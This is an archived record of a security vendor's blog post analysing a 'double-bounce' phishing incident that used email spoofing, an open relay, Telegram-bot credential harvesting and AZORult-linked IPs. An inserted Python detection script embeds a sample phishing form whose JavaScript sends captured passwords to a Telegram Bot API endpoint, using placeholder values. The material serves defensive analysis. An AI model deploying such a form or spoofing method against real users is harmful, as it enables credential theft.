{
	"id": "651feae9-470c-4514-850c-780208e94cc4",
	"created_at": "2026-04-06T00:15:00.743016Z",
	"updated_at": "2026-04-10T13:11:19.594323Z",
	"deleted_at": null,
	"sha1_hash": "c9beb962707e94a359ef0e3603030556aa99699f",
	"title": "Double-bounced attacks with email spoofing – 2022 trends",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 817624,
	"plain_text": "Double-bounced attacks with email spoofing – 2022 trends\r\nBy Liora Itkin\r\nPublished: 2022-08-31 · Archived: 2026-04-05 16:31:00 UTC\r\nLiora Itkin | September 1, 2022 | 5 minute read\r\nPhishing is such a common means of cyber-attack that enterprises routinely institute anti-phishing defense systems and policies. Yet attackers bypass phishing defenses by exploiting the bounce-back mechanism of email messages.\r\nIn this post, I will share my activities step by step in uncovering what we’re calling a “double-bounced” attack, and show how a good employee awareness program helped one of our clients protect themselves from a wide-scale attack. Let’s take a deeper look at how this works.\r\nWhat is email spoofing?\r\nTo exploit the bounce-back mechanism for email messages, an attacker spoofs the email address of the target user, forging the sender address (the envelope MAIL FROM, which is where non-delivery reports are sent, and usually the “FROM” header as well) so that the message:\r\nAppears to be from the target user\r\nIs sent to an unreachable destination\r\nWhen the recipient of a message is unreachable, the mailer daemon of the relaying server (here Mailer-daemon@secureserver.net; the attacker used secureserver.net as an open relay that routes messages to their destination) generates a non-delivery report and sends the original message back to the sender address.\r\nIn this case, because the attacker forged the sender in the email message header, the bounce carrying the phishing message goes straight to the target user, bypassing phishing policies.\r\nA case in point\r\nSince this is a common attack technique, most email vendors provide protection from email spoofing attacks. However, one of CyberProof’s enterprise clients that has this type of protection started to notice weird bounce-back emails being received by multiple
employees. When asked, the employees said they had never sent the emails.\r\nBounced-back emails\r\nOn the surface, this email looks like a simple bounced message:\r\nFigure: Example of a bounced-back email\r\nInvestigation of the attachments, however, uncovered the fact that this was a user-targeted phishing attempt. The attacker had developed a phishing HTML file, designed to steal user credentials:\r\nFigure: Phishing HTML file\r\nThe targeted email addresses were found by our cyber threat intelligence (CTI) team in old leaks and data breaches of third-party applications, and the attacker used them in this attempt. Some of the users were no longer employees.\r\nA deeper look at phishing files\r\nA deeper analysis of the phishing HTML attachments showed that after an employee fell for the phishing page and entered a password, the password was transferred to the attacker via a Telegram Bot API bot.\r\nThis indicates the use of Telegram harvesting. The attacker used Telegram as a C2 server: first stealing the credentials of the organization’s employees, and then transferring them to the C2 server.\r\nAnalysis of the HTML phishing page\r\nIdentifying the bot name\r\nUsing Burp Suite, we checked the HTTP POST requests that were sent after a fake password was entered in the phishing page. The bot’s name appeared in the response to one of those POST requests: asapcashBot\r\nInfo-stealing malware is here to stay\r\nFortunately, there were no successful logins for targeted users in places that they shouldn’t have been.
However, in the Active Directory failed-logon events, we found one anomaly that occurred two days before the phishing incident: AD blocked those sign-in attempts because they came from a malicious IP. Those attempts were against the same users that were targeted in the phishing.\r\nWe checked the reputations of all the different IPs. One was found to be malicious on VirusTotal:\r\nOn AbuseIPDB, this IP is identified as a C2 server for the AZORult malware, a well-known infostealer.\r\nFigure: AbuseIPDB report for the IP\r\nWe can’t know for sure whether it’s the same attacker; it could be someone else who targeted the same users from the same leak. This attacker tried to access the Office 365 Exchange Online app with the same user addresses targeted by the phishing email, from an IP tied to AZORult C2 infrastructure.\r\nBypassing anti-phishing policies – “Double-Bounce”\r\nContinuing with the investigation, we analyzed how the attacker bypassed the email vendor’s anti-phishing policy. I discovered a tricky approach that used the “double-bounce” technique:\r\nThe attacker sent an email to users with a spoofed FROM header (the user’s own email address) and attached fake .eml files.\r\nThe email was sent via an open relay (secureserver.net) with an empty subject line.\r\nThe attachments were blocked by the anti-spoofing policy of the client’s email gateway vendor.\r\nThe email was bounced back to secureserver.net and then to the spoofed FROM email address, back to the client’s mail gateway, which allowed it through this time.\r\nWhy the second hop passes: the non-delivery report is generated by the relay, so it arrives with the relay’s own MAILER-DAEMON address as sender and a null envelope sender (MAIL FROM <>); the forged address that the anti-spoofing policy caught on the first hop is now only inside the embedded original message, together with its attachments, and the report itself passes sender checks on its own merits. Because the relay and not the target’s gateway produced the report, the target’s SPF or DMARC record does not help here; the established defenses against this backscatter pattern are to validate bounces (for example a BATV-style signed envelope sender, so that a report for a message the organization never sent is rejected) and to apply attachment policy to the contents of non-delivery reports, treating HTML, .eml and other active content inside a DSN as suspicious rather than as a harmless copy of the sender’s own mail.\r\nInvesting in employee training reduces cyber risk\r\nAttackers always find different ways to bypass security policies.
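Before turning to what stopped the attack here, the two technical findings above (a bounce whose embedded original message carries a credential-phishing HTML page, and a page that posts the captured password to the Telegram Bot API) can be turned into a triage check. The following Python script is an added example written for this page; it is not code from the original post or from CyberProof. It builds a constructed sample of such a double-bounce message (every address, the bot token and the chat_id are made-up placeholders, not the ones seen in the incident), parses the non-delivery report with the standard-library email module, walks into the embedded message/rfc822 part, and reports the indicators that separate this carrier from an ordinary bounce: a MAILER-DAEMON sender with a null Return-Path, an original From equal to the bounce recipient, a password form in the attached HTML, and the Telegram bot token and chat_id the page would exfiltrate to.

```python
import json
import re
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser
from email.utils import parseaddr

# Exfiltration pattern used by Telegram-harvesting phishing kits: the page POSTs the
# captured credentials to api.telegram.org/bot<token>/sendMessage (or sendDocument).
TELEGRAM_API = re.compile(r'api[.]telegram[.]org/bot([0-9]+:[A-Za-z0-9_-]+)/(sendMessage|sendDocument)')
CHAT_ID = re.compile(r'chat_id=([0-9-]+)')
PASSWORD_INPUT = re.compile(r'<input[^>]*type=[^>]*password', re.IGNORECASE)

# Constructed sample phishing page. The bot token and chat_id are placeholders, not real ones.
PHISH_HTML = '''<html><body>
<form id='login'>
  <input type='email' name='user'>
  <input type='password' name='pass'>
  <button>Sign in</button>
</form>
<script>
document.getElementById('login').onsubmit = function (e) {
  e.preventDefault();
  var f = e.target;
  fetch('https://api.telegram.org/bot1234567890:AAF0example-not-a-real-token/sendMessage', {
    method: 'POST',
    headers: {'Content-Type': 'application/x-www-form-urlencoded'},
    body: 'chat_id=987654321&text=' + encodeURIComponent(f.user.value + ':' + f.pass.value)
  });
};
</script>
</body></html>'''


def build_sample_bounce(victim='victim@example.com'):
    '''Constructed double-bounce: a relay's non-delivery report addressed to the forged
    sender, carrying the attacker's original message (with its HTML attachment) as
    a message/rfc822 part. All addresses are hypothetical.'''
    original = EmailMessage()
    original['From'] = victim                       # forged: the target's own address
    original['To'] = 'nobody@nonexistent.invalid'   # unreachable on purpose (no Subject, as in the attack)
    original.set_content('')
    original.add_attachment(PHISH_HTML.encode(), maintype='text', subtype='html',
                            filename='invoice.html')

    dsn = EmailMessage()
    dsn['From'] = 'MAILER-DAEMON@secureserver.net'  # the relay's own daemon, not the attacker
    dsn['To'] = victim                              # bounce goes to the forged sender, i.e. the victim
    dsn['Return-Path'] = '<>'                       # non-delivery reports use the null envelope sender
    dsn['Subject'] = 'Undeliverable'
    dsn.set_content('Delivery to the following recipient failed permanently.')
    dsn.add_attachment(original)                    # serialized as Content-Type: message/rfc822
    return dsn.as_bytes()


def triage_bounce(raw):
    '''Parse a bounce and return the indicators that distinguish a double-bounce
    phishing carrier from an ordinary non-delivery report.'''
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    outer_from = parseaddr(msg.get('From', ''))[1].lower()
    outer_to = parseaddr(msg.get('To', ''))[1].lower()
    findings = {
        'is_bounce': outer_from.startswith(('mailer-daemon', 'postmaster'))
                     or msg.get('Return-Path', '').strip() == '<>',
        'bounce_to': outer_to,
        'original_from': None,
        'self_addressed': False,   # original message claims to be from the bounce recipient
        'html_parts': [],
    }
    for part in msg.walk():
        ctype = part.get_content_type()
        if ctype == 'message/rfc822':
            inner = part.get_payload(0)   # the embedded original message
            findings['original_from'] = parseaddr(inner.get('From', ''))[1].lower()
            findings['self_addressed'] = findings['original_from'] == outer_to
            continue
        if part.is_multipart():
            continue
        filename = part.get_filename() or ''
        if ctype != 'text/html' and not filename.lower().endswith('.html'):
            continue
        # decode=True undoes base64/quoted-printable; the page is then scanned as text
        html = part.get_payload(decode=True).decode('utf-8', 'replace')
        token = TELEGRAM_API.search(html)
        chat = CHAT_ID.search(html)
        findings['html_parts'].append({
            'filename': filename,
            'credential_form': bool(PASSWORD_INPUT.search(html)),
            'telegram_bot_token': token.group(1) if token else None,
            'telegram_chat_id': chat.group(1) if chat else None,
        })
    carrier = any(p['credential_form'] or p['telegram_bot_token'] for p in findings['html_parts'])
    findings['verdict'] = 'double-bounce phishing carrier' if findings['is_bounce'] and carrier else 'ordinary bounce'
    return findings


if __name__ == '__main__':
    print(json.dumps(triage_bounce(build_sample_bounce()), indent=2))
```

The extracted token is the attacker’s own credential for the bot: an analyst can confirm the bot’s username (as the post did with asapcashBot) by calling the Bot API getMe method with it, and the chat_id identifies where harvested credentials were being delivered. On the gateway side the same checks apply to every non-delivery report that carries a message/rfc822 or HTML part, since the report’s From is the relay’s legitimate address rather than the forged one and passes sender checks on its own.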
But in this case, the awareness and training of the employees made all the difference.\r\nIn this organization, employees were all enrolled in a special anti-phishing training program, which warns them against opening attachments or clicking links they don’t know.\r\nThe results of this program are clear. The employee training, which focused on the importance of stopping cyber attacks, prevented this attack and protected the organization from harm.\r\nInterested in learning about how to reduce the risk to an enterprise posed by phishing and other forms of attack? Speak with an expert today!\r\nLiora Itkin, Senior Security Expert at CyberProof. Liora is a part of CyberProof's global SOC, and is a point of escalation during investigations and in providing recommendations for clients so they can improve their performance. Liora specializes in hands-on incident handling: detecting and responding to cyber incidents, conducting malware analysis, and proactively monitoring and reviewing threats and suspicious events reported by clients. Liora has had a consistent track record of excellence starting with her service in the Israeli Intelligence Corps, where she held the position of Head of the Cyber Security Department, in which role she managed and ran the SOC team and the DFIR and Threat Hunting teams.\r\nSource: https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends"
	],
	"report_names": [
		"double-bounced-attacks-with-email-spoofing-2022-trends"
	],
	"threat_actors": [],
	"ts_created_at": 1775434500,
	"ts_updated_at": 1775826679,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c9beb962707e94a359ef0e3603030556aa99699f.pdf",
		"text": "https://archive.orkl.eu/c9beb962707e94a359ef0e3603030556aa99699f.txt",
		"img": "https://archive.orkl.eu/c9beb962707e94a359ef0e3603030556aa99699f.jpg"
	}
}